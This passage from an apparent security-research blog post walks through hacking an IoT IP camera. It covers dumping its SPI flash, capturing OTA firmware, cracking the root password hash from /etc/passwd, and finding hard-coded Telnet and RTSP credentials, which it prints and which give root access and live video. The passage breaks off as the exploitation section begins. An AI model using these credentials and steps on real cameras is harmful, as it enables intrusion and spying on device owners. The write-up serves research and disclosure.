href="#4-1-从-SPI-Flash-芯片里提取固件" class="headerlink" title="4.1 从 SPI Flash 芯片里提取固件"></a>4.1 Extracting firmware from the SPI Flash chip</h3><p>Here we use a Bus Pirate + adapter socket + SOP8 test clip to connect to the SPI Flash chip and extract the firmware.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0005.jpg" alt=""></p><p>Read the contents of the SPI Flash chip to a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ flashrom -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r flash_0.bin</span><br></pre></td></tr></table></figure><h3 id="4-2-从空气中提取固件"><a href="#4-2-从空气中提取固件" class="headerlink" title="4.2 从空气中提取固件"></a>4.2 
Extracting Firmware from the Air</h3><p><strong>Extracting firmware from the air</strong> is the best way to obtain a vendor's original update firmware in the IoT era, where firmware is upgraded over the air (OTA)!</p><p><a href="https://zh.wikipedia.org/wiki/%E7%A9%BA%E4%B8%AD%E7%BC%96%E7%A8%8B" target="_blank" rel="noopener">OTA</a> (over-the-air) means updating firmware over the air. Extracting firmware from the air really means extracting it from the network: capture every packet transferred during the firmware update, then reassemble the packets to restore the original firmware file. This requires the device firmware to support OTA updates, but most vendors' IoT devices currently support it by default.</p><p>The device model we are using happens to have a new firmware update being pushed, so the firmware can be obtained this way.</p><p>Packets are captured here on an OpenWrt router that has <code>tcpdump</code> installed and supports external USB storage. The device being captured must be connected to this router's SSID.</p><p>Capture the traffic on the wireless interface</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tcpdump -i wlan0-1 -w wlan0-1_$(date +%s).<span class="built_in">cap</span></span><br></pre></td></tr></table></figure><p>Once the capture is running, tap the firmware upgrade for the device in the controlling app (it is best to back up the SPI flash before updating, to keep the old firmware version).</p><p><img src="//files.iternull.com/images/2017-12-26_01-0006.png" alt=""></p><p>Save the data streams from the captured packets to files</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tcpflow -r wlan0-1_1515316239.cap</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0007.png" alt=""></p><p>List the data files of unknown format</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ file * | grep data</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0008.png" alt=""></p><p>Recursively scan it and extract the files of known formats</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ binwalk -Me 211.140.013.023.15050-172.016.042.116.42004</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0009.png" alt=""></p><p>The files of known formats found by the recursive scan and extraction</p><p><img src="//files.iternull.com/images/2017-12-26_01-0010.png" alt=""></p><h2 
id="5-固件逆向"><a href="#5-固件逆向" class="headerlink" title="5 固件逆向"></a>5 Firmware Reverse Engineering</h2><h3 id="5-1-解包固件"><a href="#5-1-解包固件" class="headerlink" title="5.1 解包固件"></a>5.1 Unpacking the Firmware</h3><p>Recursively scan the SPI flash backup and extract the files of known formats</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ binwalk -Me flash_0.bin</span><br></pre></td></tr></table></figure><p>Inspect the recursively extracted files</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> _flash_0.bin.extracted/</span><br><span class="line">$ tree -L 3</span><br><span class="line">$ ls -l squashfs-root*</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0011.png" alt=""></p><p>Inspect the Linux users and passwords</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> squashfs-root/</span><br><span class="line">$ <span class="built_in">cd</span> etc/</span><br><span class="line">$ cat passwd</span><br><span class="line">root:<span class="variable">$1</span><span class="variable">$jSqQv</span>.uP<span class="variable">$jgz4lwEx2pnDh4QwXkh06</span>/:0:0:root:/:/bin/sh</span><br></pre></td></tr></table></figure><p>The <code>passwd</code> file shows that the system has a single root user with a salted password hash and <code>/bin/sh</code> as the login shell. <a href="http://www.openwall.com/john/" target="_blank" rel="noopener">John the Ripper</a> is used to crack the hash and recover the plaintext password.</p><p>The recovered credentials:<br>User: <code>root</code><br>Password: <code>vizxv</code></p><p>Logging in to Telnet with this account did not succeed.</p><h3 id="5-2-分析-Telnet"><a href="#5-2-分析-Telnet" class="headerlink" title="5.2 分析 Telnet"></a>5.2 Analyzing 
Telnet</h3><p>Since logging in as the system user failed, the only option is to start from the Telnet server program, analyze how it verifies logins and find the correct username and password.</p><p>Locate the Telnet server program</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> _flash_0.bin.extracted/squashfs-root/</span><br><span class="line">$ find ./ -name '*telnet*'</span><br><span class="line">./bin/telnet <span class="comment"># Telnet client</span></span><br><span class="line">./sbin/telnetd <span class="comment"># Telnet server</span></span><br></pre></td></tr></table></figure><p>Disassembling <code>telnetd</code> with IDA Pro shows that the Telnet username and password are hard-coded in the program.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0012.png" alt=""><br><img src="//files.iternull.com/images/2017-12-26_01-0013.png" alt=""></p><p><strong>Telnet login account</strong><br>User: <code>admin</code><br>Password: <code>7ujMko0admin</code></p><p>Try logging in to Telnet again with this user</p><p><img src="//files.iternull.com/images/2017-12-26_01-0014.png" alt=""></p><blockquote><p><strong>Success!!!</strong><br>We now have a shell and root privileges</p></blockquote><h3 id="5-3-收集系统运行信息"><a href="#5-3-收集系统运行信息" class="headerlink" title="5.3 收集系统运行信息"></a>5.3 Collecting Runtime System Information</h3><p>Here we log in over Telnet and collect information by hand; compared with running the <a href="https://github.com/craigz28/firmwalker" target="_blank" rel="noopener">firmwalker</a> script over the unpacked firmware, this captures more information from the memory of the running device.</p><p>Collect information on running processes</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># ps</span></span><br><span class="line">PID USER TIME COMMAND</span><br><span class="line"> 1 root 0:00 init</span><br><span class="line"> 2 root 0:00 [kthreadd]</span><br><span class="line"> 3 root 0:00 [ksoftirqd/0]</span><br><span class="line"> 4 root 0:00 [kworker/0:0]</span><br><span class="line"> 5 root 0:01 [kworker/u:0]</span><br><span class="line"> 6 root 0:06 [rcu_kthread]</span><br><span class="line"> 7 root 0:00 [khelper]</span><br><span class="line"> 8 root 0:00 [kworker/u:1]</span><br><span class="line"> 72 root 0:00 [sync_supers]</span><br><span class="line"> 74 root 0:00 [bdi-default]</span><br><span class="line"> 76 root 0:00 [kblockd]</span><br><span class="line"> 168 root 0:00 [kswapd0]</span><br><span class="line"> 217 root 0:00 [fsnotify_mark]</span><br><span class="line"> 224 root 0:00 [crypto]</span><br><span class="line"> 238 root 0:00 [mtdblock0]</span><br><span class="line"> 243 root 0:00 [mtdblock1]</span><br><span 
class="line"> 248 root 0:00 [mtdblock2]</span><br><span class="line"> 253 root 0:00 [mtdblock3]</span><br><span class="line"> 258 root 0:00 [mtdblock4]</span><br><span class="line"> 263 root 0:01 [mtdblock5]</span><br><span class="line"> 268 root 0:00 [mtdblock6]</span><br><span class="line"> 273 root 0:00 [mtdblock7]</span><br><span class="line"> 281 root 0:00 [kpsmoused]</span><br><span class="line"> 282 root 0:00 [kworker/0:1]</span><br><span class="line"> 324 root 0:00 [jffs2_gcd_mtd7]</span><br><span class="line"> 342 root 0:00 /sbin/telnetd</span><br><span class="line"> 397 root 0:00 [khubd]</span><br><span class="line"> 418 root 0:00 [OSA_416_1]</span><br><span class="line"> 478 root 0:00 [OSA_462_3]</span><br><span class="line"> 483 root 0:00 [OSA_462_4]</span><br><span class="line"> 502 root 0:00 syshelper elper 60</span><br><span class="line"> 526 root 0:00 [cfg80211]</span><br><span class="line"> 533 root 0:01 /usr/bin/wpa_supplicant -g/var/tmp/wpa_supplicant-global -P/var/tmp/eth2.pid</span><br><span class="line"> 543 root 0:00 [kworker/u:2]</span><br><span class="line"> 548 root 0:00 [flush-mtd-unmap]</span><br><span class="line"> 556 root 0:54 VideoDaemon AEWB</span><br><span class="line"> 557 root 0:00 /bin/sh /etc/init.d/appauto</span><br><span class="line"> 581 root 0:00 /bin/sh ./usr/etc/app.sh</span><br><span class="line"> 587 root 1:58 /usr/bin/sonia</span><br><span class="line"> 612 root 0:01 [RTW_CMD_THREAD]</span><br><span class="line"> 913 root 0:00 [kworker/u:3]</span><br><span class="line"> 1295 root 0:00 -sh</span><br><span class="line"> 1427 root 0:00 ps</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect Linux version information</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">/proc <span class="comment"># cat 
version</span></span><br><span class="line">Linux version 3.0.8 (@centos-68) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.30.2+eabi+linuxpthread)) )</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect processor information</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">~ <span class="comment"># cd /proc/</span></span><br><span class="line">/proc <span class="comment"># cat cpuinfo</span></span><br><span class="line">Processor : ARM926EJ-S rev 5 (v5l)</span><br><span class="line">BogoMIPS : 218.72</span><br><span class="line">Features : swp half fastmult edsp java</span><br><span class="line">CPU implementer : 0x41</span><br><span class="line">CPU architecture: 5TEJ</span><br><span class="line">CPU variant : 0x0</span><br><span class="line">CPU part : 0x926</span><br><span class="line">CPU revision : 5</span><br><span class="line"></span><br><span class="line">Hardware : hi3518</span><br><span class="line">Revision : 0000</span><br><span class="line">Serial : 0000000000000000</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect memory information</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">/proc <span class="comment"># cat meminfo</span></span><br><span class="line">MemTotal: 41604 kB</span><br><span class="line">MemFree: 1832 kB</span><br><span class="line">Buffers: 3948 kB</span><br><span class="line">Cached: 11636 kB</span><br><span class="line">SwapCached: 0 kB</span><br><span class="line">Active: 20528 kB</span><br><span class="line">Inactive: 7928 kB</span><br><span class="line">Active(anon): 12920 kB</span><br><span class="line">Inactive(anon): 296 kB</span><br><span class="line">Active(file): 7608 kB</span><br><span class="line">Inactive(file): 7632 kB</span><br><span class="line">Unevictable: 0 kB</span><br><span class="line">Mlocked: 0 kB</span><br><span class="line">SwapTotal: 0 kB</span><br><span class="line">SwapFree: 0 kB</span><br><span class="line">Dirty: 0 kB</span><br><span class="line">Writeback: 0 kB</span><br><span class="line">AnonPages: 12896 kB</span><br><span class="line">Mapped: 7156 kB</span><br><span class="line">Shmem: 344 kB</span><br><span class="line">Slab: 3356 
kB</span><br><span class="line">SReclaimable: 868 kB</span><br><span class="line">SUnreclaim: 2488 kB</span><br><span class="line">KernelStack: 728 kB</span><br><span class="line">PageTables: 476 kB</span><br><span class="line">NFS_Unstable: 0 kB</span><br><span class="line">Bounce: 0 kB</span><br><span class="line">WritebackTmp: 0 kB</span><br><span class="line">CommitLimit: 20800 kB</span><br><span class="line">Committed_AS: 449116 kB</span><br><span class="line">VmallocTotal: 966656 kB</span><br><span class="line">VmallocUsed: 17412 kB</span><br><span class="line">VmallocChunk: 931184 kB</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect TCP connection information</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">/proc <span class="comment"># cat /proc/net/tcp</span></span><br><span class="line"> sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode</span><br><span class="line"> 0: 00000000:1388 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 403 1 c2658460 300 0 0 2 -1</span><br><span class="line"> 1: 00000000:022A 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 513 1 c2659180 300 0 0 2 -1</span><br><span class="line"> 2: 00000000:9390 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 415 1 c26588c0 300 0 0 2 -1</span><br><span class="line"> 3: 00000000:9391 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 412 1 c2658d20 300 0 0 2 -1</span><br><span class="line"> 4: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 
00000000 0 0 162 1 c2658000 300 0 0 2 -1</span><br><span class="line"> 5: EC08A8C0:0017 7E08A8C0:CFA9 01 00000002:00000000 01:0000001D 00000000 0 0 1444 4 c26595e0 31 4 25 10 9</span><br><span class="line"> 6: EC08A8C0:A135 120D8CD3:BF86 01 00001E8F:00000000 01:0000001D 00000000 0 0 1052 2 c2659ea0 31 4 0 18 7</span><br><span class="line"> 7: EC08A8C0:B352 160D8CD3:3572 01 00000000:00000000 00:00000000 00000000 0 0 1042 1 c2659a40 21 4 30 5 3</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p><code>local_address</code> and <code>rem_address</code> are both written in hexadecimal, and the bytes of the IP address are in reverse order.<br><code>6B 02 A8 C0</code> converted to decimal is <code>107 2 168 192</code>, which as a normal IPv4 address is <code>192.168.2.107</code>.<br><code>0017</code> is the port number, also written in hexadecimal; in decimal it is <code>23</code>.<br>If converting by hand is too tedious, the <a href="https://gist.github.com/jkstill/5095725" target="_blank" rel="noopener">proc_net_tcp_decode</a> script can do the conversion.</p><p>Collect UDP connection information</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">/proc <span class="comment"># cat /proc/net/udp</span></span><br><span class="line"> sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode ref pointer drops</span><br><span class="line"> 146: 00000000:9392 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 416 2 c1dcf800 0</span><br><span class="line"> 146: 00000000:9392 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 413 2 c1dcf600 0</span><br><span class="line"> 178: EC08A8C0:93B2 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1061 2 c0b16400 0</span><br><span class="line"> 178: FBFFFFEF:93B2 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 
0 1060 2 c0b16000 0</span><br><span class="line"> 186: 00000000:13BA 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 382 2 c1dcf400 0</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect the installed command-line tools</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">~ <span class="comment">#</span></span><br><span class="line">VideoDaemon cat dmesg grep ip logView netinit <span class="built_in">pwd</span> ssl/ top</span><br><span class="line">[ chgrp du halt ipaddr login netinit6 reboot <span class="built_in">stat</span> touch</span><br><span class="line">[[ chmod <span class="built_in">echo</span> head iplink ls netstat redirClient sync udhcpd</span><br><span class="line">aewDebug chown egrep hostapd iproute lsmod netwifi redir_stdio syshelper udpsvd</span><br><span class="line">appauto chroot env hush iprule mdev nice rm systools umount</span><br><span class="line">armbenv clearparam fdisk hwclock iptunnel mkdir nslookup rmdir tail uname</span><br><span class="line">arp cp fgrep ifconfig iwconfig mknod ping rmmod tcpsvd unlzma</span><br><span class="line">arping cut find ifenslave <span class="built_in">kill</span> mnt_jffs2 ping6 route telnet unzip</span><br><span class="line">ash date free ii killall modinfo pkill sed telnetd vi</span><br><span class="line">audioDebug dd fsync inetd killall5 more poweroff seq <span class="built_in">test</span> who</span><br><span class="line">bash df gethwid init less mount 
printenv sh tftp whoami</span><br><span class="line">busybox dh_keyboard getty insmod ln mv ps sonia tftpd wpa_supplicant</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect directory information</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># mount</span></span><br><span class="line">rootfs on / <span class="built_in">type</span> rootfs (rw)</span><br><span class="line">/dev/root on / <span class="built_in">type</span> squashfs (ro,relatime)</span><br><span class="line">devtmpfs on /dev <span class="built_in">type</span> devtmpfs (rw,relatime,size=20760k,nr_inodes=5190,mode=755)</span><br><span class="line">proc on /proc <span class="built_in">type</span> proc (rw,relatime)</span><br><span class="line">sysfs on /sys <span class="built_in">type</span> sysfs (rw,relatime)</span><br><span class="line">devpts on /dev/pts <span class="built_in">type</span> devpts (rw,relatime,mode=600,ptmxmode=000)</span><br><span class="line">tmpfs on /var <span class="built_in">type</span> tmpfs (rw,relatime)</span><br><span class="line">/dev/mtdblock5 on /usr <span class="built_in">type</span> squashfs (ro,relatime)</span><br><span class="line">/dev/mtdblock7 on /mnt/mtd <span class="built_in">type</span> jffs2 (rw,relatime)</span><br><span class="line">usbfs on /proc/bus/usb <span class="built_in">type</span> usbfs (rw,relatime)</span><br><span class="line">~ <span 
class="comment">#</span></span><br><span class="line">~ <span class="comment"># pwd</span></span><br><span class="line">/</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># touch aaa</span></span><br><span class="line">touch: aaa: Read-only file system</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># mount | grep rw</span></span><br><span class="line">rootfs on / <span class="built_in">type</span> rootfs (rw)</span><br><span class="line">devtmpfs on /dev <span class="built_in">type</span> devtmpfs (rw,relatime,size=20760k,nr_inodes=5190,mode=755)</span><br><span class="line">proc on /proc <span class="built_in">type</span> proc (rw,relatime)</span><br><span class="line">sysfs on /sys <span class="built_in">type</span> sysfs (rw,relatime)</span><br><span class="line">devpts on /dev/pts <span class="built_in">type</span> devpts (rw,relatime,mode=600,ptmxmode=000)</span><br><span class="line">tmpfs on /var <span class="built_in">type</span> tmpfs (rw,relatime)</span><br><span class="line">/dev/mtdblock7 on /mnt/mtd <span class="built_in">type</span> jffs2 (rw,relatime)</span><br><span class="line">usbfs on /proc/bus/usb <span class="built_in">type</span> usbfs (rw,relatime)</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># cd /var/</span></span><br><span class="line">/var <span class="comment"># touch aaa</span></span><br><span class="line">/var <span class="comment"># ls -l</span></span><br><span class="line">total 0</span><br><span class="line">-rw-r--r-- 1 root root 0 Jan 25 04:23 aaa</span><br><span class="line">drwxr-xr-x 10 root root 440 Jan 25 04:02 tmp</span><br><span class="line">p-wx------ 1 root root 0 Jan 25 04:00 videoDebug</span><br><span class="line">drwxr-xr-x 2 root root 80 Jan 25 04:00 web</span><br><span class="line">/var <span 
class="comment">#</span></span><br><span class="line">/var <span class="comment"># cd /mnt/mtd/</span></span><br><span class="line">/mnt/mtd <span class="comment"># touch aaa</span></span><br><span class="line">/mnt/mtd <span class="comment"># ls -l</span></span><br><span class="line">total 6</span><br><span class="line">drwxr-xr-x 2 root root 0 Jan 1 1970 3A</span><br><span class="line">drwxr-xr-x 3 root root 0 Jan 25 04:00 Config</span><br><span class="line">drwxr-xr-x 2 root root 0 Nov 11 2016 Log</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 RtcSramFile</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 RtcSramFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 0 Jan 25 04:27 aaa</span><br><span class="line">drwxr-xr-x 2 root root 0 Jan 1 2000 audiofiles</span><br><span class="line">-rw-r--r-- 1 root root 36 Jan 25 04:00 flgFile</span><br><span class="line">-rw-r--r-- 1 root root 36 Jan 25 04:00 flgFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 556 Jan 25 04:15 recordSramFile</span><br><span class="line">-rw-r--r-- 1 root root 556 Jan 25 04:15 recordSramFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 socRtcSram</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 socRtcSramBackUp</span><br><span class="line">-rw-r--r-- 1 root root 21 Jan 1 2000 wifiModifyTime</span><br><span class="line">/mnt/mtd <span class="comment">#</span></span><br><span class="line"></span><br><span class="line">~ <span class="comment"># ls -l</span></span><br><span class="line">total 0</span><br><span class="line">drwxr-xr-x 2 root root 993 Jan 1 1970 bin</span><br><span class="line">drwxr-xr-x 7 root root 3200 Jan 25 04:00 dev</span><br><span class="line">drwxr-xr-x 4 root root 258 Jan 1 1970 etc</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 home</span><br><span class="line">drwxr-xr-x 2 root root 534 Jan 1 1970 lib</span><br><span 
class="line">lrwxrwxrwx 1 root root 11 Jan 1 1970 linuxrc -> bin/busybox</span><br><span class="line">drwxr-xr-x 12 root root 170 Jan 1 1970 mnt</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 nfs</span><br><span class="line">dr-xr-xr-x 57 root root 0 Jan 1 1970 proc</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 root</span><br><span class="line">drwxr-xr-x 2 root root 423 Jan 1 1970 sbin</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 share</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 slave</span><br><span class="line">drwxr-xr-x 11 root root 0 Jan 1 1970 sys</span><br><span class="line">lrwxrwxrwx 1 root root 8 Jan 1 1970 tmp -> var/tmp/</span><br><span class="line">drwx--x--x 9 25858 25858 96 Oct 14 2015 usr</span><br><span class="line">drwxrwxrwt 4 root root 100 Jan 25 04:00 var</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>Collect network interface information</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">~ <span class="comment"># ifconfig</span></span><br><span class="line">eth2 Link encap:Ethernet HWaddr E0:50:8B:35:74:02</span><br><span class="line"> inet addr:192.168.8.236 Bcast:192.168.8.255 Mask:255.255.255.0</span><br><span class="line"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span><br><span class="line"> RX 
packets:8895 errors:0 dropped:234 overruns:0 frame:0</span><br><span class="line"> TX packets:35955 errors:0 dropped:0 overruns:0 carrier:0</span><br><span class="line"> collisions:0 txqueuelen:1000</span><br><span class="line"> RX bytes:894282 (873.3 KiB) TX bytes:43996613 (41.9 MiB)</span><br><span class="line"></span><br><span class="line">lo Link encap:Local Loopback</span><br><span class="line"> inet addr:127.0.0.1 Mask:255.0.0.0</span><br><span class="line"> UP LOOPBACK RUNNING MTU:16436 Metric:1</span><br><span class="line"> RX packets:73 errors:0 dropped:0 overruns:0 frame:0</span><br><span class="line"> TX packets:73 errors:0 dropped:0 overruns:0 carrier:0</span><br><span class="line"> collisions:0 txqueuelen:0</span><br><span class="line"> RX bytes:15590 (15.2 KiB) TX bytes:15590 (15.2 KiB)</span><br><span class="line"></span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><!--Locating running services and open port numbers: because the `netstat` and `lsof -i` commands cannot be used on this system, the raw information has to be collected manually from the `/proc/` directory and decoded into readable form.--><!----><h3 id="5-4-找出-RTSP-用户名与密码"><a href="#5-4-找出-RTSP-用户名与密码" class="headerlink" title="5.4 找出 RTSP 用户名与密码"></a>5.4 Finding the RTSP Username and Password</h3><p>Connecting to the IPCamera's RTSP server with <a href="https://www.videolan.org/" target="_blank" rel="noopener">VLC media player</a> shows that the service requires username and password authentication.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0015.png" alt=""></p><p>Decompiling several of the proprietary programs running on the system with IDA Pro shows that most configuration files are stored under the <code>/mnt/</code> directory. Several accounts were then found in the file <code>/mnt/pd/product.zip</code>.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0016.png" alt=""></p><p>Trying these accounts against the service shows that the <code>admin</code> account works, and the connection to the IPCamera's RTSP service succeeds. The live video and audio can be seen directly in VLC media player.</p><p><img src="//files.iternull.com/images/2017-12-26_01-0017.png" alt=""></p><h3 id="5-5-嗅探-5000-端口运行的服务"><a href="#5-5-嗅探-5000-端口运行的服务" class="headerlink" title="5.5 嗅探 5000 端口运行的服务"></a>5.5 Probing the Service Running on Port 5000</h3><p>Connecting with NetCat to port <code>5000</code>
returns nothing; text sent to it gets no reply either, and after a certain number of bytes have been sent the connection is closed automatically.</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ nc 192.168.8.236 5000</span><br></pre></td></tr></table></figure><p>Scanning the LAN for devices running UPnP with the <a href="https://github.com/0x90/miranda-upnp" target="_blank" rel="noopener">miranda-upnp</a> tool also found no information about the IPCamera. What service runs on this port has not been determined yet; it may be related to remote configuration within the LAN.</p><h2 id="6-APP-逆向"><a href="#6-APP-逆向" class="headerlink" title="6 APP 逆向"></a>6 App Reverse Engineering</h2><p>The app may retain some useful information, so a brief analysis of it is attempted here.</p><h3 id="6-1-解包程序逆向代码"><a href="#6-1-解包程序逆向代码" class="headerlink" title="6.1 解包程序逆向代码"></a>6.1 Unpacking the App and Decompiling Its Code</h3><p>Unpack the <code>.apk</code> file with Apktool</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ apktool d hhy.apk</span><br></pre></td></tr></table></figure><p>Convert the <code>.dex</code> file to <code>.class</code> files with dex2jar</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> hhy/assets/</span><br><span class="line">$ dex2jar classes.dex</span><br></pre></td></tr></table></figure><p>View the decompiled code with <a href="http://jd.benow.ca/" target="_blank" rel="noopener">JD-GUI</a></p><p><img src="//files.iternull.com/images/2017-12-26_01-0018.png" alt=""></p><p>RTSP-related content was found here</p><h3 id="6-2-APP-网络通信分析"><a href="#6-2-APP-网络通信分析" class="headerlink" title="6.2 APP 网络通信分析"></a>6.2 App Network Traffic Analysis</h3><p><a href="https://portswigger.net/burp" target="_blank" rel="noopener">Burp Suite</a> can be used to analyze and modify the app's network traffic. This is not covered here.</p><h2 id="7-漏洞利用"><a href="#7-漏洞利用" class="headerlink" title="7 漏洞利用"></a>7 Exploitation</h2><h3 id="7-1-作为直播摄像头"><a href="#7-1-作为直播摄像头" class="headerlink" title="7.1 作为直播摄像头"></a>7.1 As a Live-Streaming Camera</h3><p>This IPCamera runs an RTSP service, so we can try feeding its video stream into <a
